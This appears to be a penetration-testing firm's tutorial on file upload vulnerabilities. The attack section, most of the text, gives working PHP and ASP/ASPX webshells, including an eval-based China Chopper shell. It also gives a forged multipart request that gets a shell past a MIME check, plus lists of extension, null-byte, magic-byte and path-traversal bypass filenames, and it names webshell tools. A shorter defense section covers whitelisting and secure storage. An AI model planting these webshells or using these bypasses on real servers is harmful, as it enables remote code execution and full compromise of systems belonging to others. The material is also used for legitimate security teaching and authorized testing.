File upload vulnerabilities occur when web applications allow users to upload files without properly validating the file type, content, or name. This can lead to remote code execution, defacement, phishing, or complete system compromise.
Understanding File Upload Attacks
Attackers exploit file upload functionality to upload malicious files (webshells, backdoors, malware) that can be executed on the server, leading to complete system compromise.
Types of File Upload Attacks
1. Unrestricted File Upload
No validation whatsoever - the most dangerous scenario.
# PHP Webshell (simple.php)
<?php system($_GET['cmd']); ?>
# Usage: http://victim.com/uploads/simple.php?cmd=whoami
# More advanced webshell
<?php
if(isset($_POST['cmd'])) {
echo "<pre>" . shell_exec($_POST['cmd']) . "</pre>";
}
?>
<form method="POST">
<input type="text" name="cmd">
<input type="submit" value="Execute">
</form>
2. Client-Side Validation Bypass
Applications relying only on JavaScript validation can be easily bypassed.
# Vulnerable JavaScript validation
function validateFile() {
var ext = file.name.split('.').pop().toLowerCase();
if(ext != 'jpg' && ext != 'png') {
alert('Only JPG/PNG allowed!');
return false;
}
}
# Bypass methods:
1. Disable JavaScript in browser
2. Intercept request with Burp Suite and modify extension
3. Use curl/wget to upload directly
3. MIME Type Bypass
# Server-side MIME type check (vulnerable)
if($_FILES['file']['type'] != 'image/jpeg') {
die('Only JPEG allowed!');
}
# Bypass: Modify Content-Type header in POST request
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg <-- Modified to bypass check
<?php system($_GET['cmd']); ?>
Advanced Bypass Techniques
Extension Bypass Methods
# Double extension
shell.php.jpg
shell.jpg.php
# Null byte injection (PHP < 5.3.4)
shell.php%00.jpg
shell.php\x00.jpg
# Case manipulation
shell.PHP
shell.PhP
shell.pHp
# Alternate extensions
PHP: .php, .php3, .php4, .php5, .phtml, .pht
ASP: .asp, .aspx, .cer, .asa
JSP: .jsp, .jspx, .jsw, .jsv, .jspf
Perl: .pl, .pm, .cgi, .lib
# Appending dots/spaces (Windows)
shell.php.
shell.php (trailing space)
shell.php::$DATA
Magic Bytes Manipulation
# Add image headers to webshell
GIF89a; # GIF header
<?php system($_GET['cmd']); ?>
# JPEG header
\xFF\xD8\xFF\xE0
<?php system($_GET['cmd']); ?>
# PNG header
\x89PNG\r\n\x1a\n
<?php system($_GET['cmd']); ?>
Path Traversal in Upload
# Upload to different directory
filename="../../shell.php"
filename="../../../var/www/html/shell.php"
# Windows path traversal
filename="..\..\..\..\shell.php"
# URL encoding
filename="..%2F..%2Fshell.php"
Webshell Types
PHP Webshells
# One-liner
<?php system($_GET['cmd']); ?>
<?php eval($_POST['cmd']); ?>
<?php @eval($_POST['cmd']); ?> // suppresses errors
# China Chopper (famous mini webshell)
<?php @eval($_POST['chopper']); ?>
# File manager webshell
<?php
$dir = isset($_GET['dir']) ? $_GET['dir'] : '.';
$files = scandir($dir);
foreach($files as $file) {
echo $file . "<br>";
}
?>
ASP/ASPX Webshells
# ASP Classic
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oExec = oScript.Exec("cmd /c " & Request("cmd"))
Response.write(oExec.StdOut.ReadAll())
%>
# ASPX
<%@ Page Language="C#" %>
<% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]); %>
Exploitation Tools
- Weevely: Weaponized web shell with 30+ modules
- WSO (Web Shell by Orb): Feature-rich PHP webshell
- b374k: PHP webshell with file manager
- C99 Shell: Classic multipurpose webshell
- AntSword: Modern cross-platform webshell manager
Defense Strategies
Secure File Upload Implementation
Implementing multiple layers of validation and security controls is essential.
1. Whitelist File Extensions
# PHP example
$allowed = array('jpg', 'jpeg', 'png', 'gif');
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if(!in_array($ext, $allowed)) {
die('Invalid file type!');
}
2. Content Validation
- Verify file content matches extension (magic bytes)
- Use image processing libraries to validate images
- Scan files with antivirus
3. Secure File Storage
# Store files outside web root
/var/uploads/ (not accessible via web)
# Rename files to random names
$newname = bin2hex(random_bytes(16)) . '.' . $ext;
# Set proper permissions
chmod 0644 uploaded_file # Read-only
# Disable script execution in upload directory
# .htaccess:
php_flag engine off
AddType text/plain .php .php3 .phtml
4. Additional Controls
- Implement file size limits
- Use Content Security Policy headers
- Implement rate limiting
- Log all upload activities
- Regular security audits
Ethical Testing Only
This information is for educational purposes and authorized penetration testing only. Unauthorized exploitation is illegal.
HackHub Professional Services
Expert File Upload Security Testing
The HackHub team provides comprehensive file upload security assessments, identifying vulnerabilities and implementing robust defenses. With 10+ years of experience, we help secure your upload functionality against sophisticated attacks.
Contact [email protected] for professional security services.
Conclusion
File upload vulnerabilities remain a critical attack vector that can lead to complete system compromise. Implementing comprehensive validation, secure storage practices, and regular security testing are essential for protecting web applications from file upload attacks.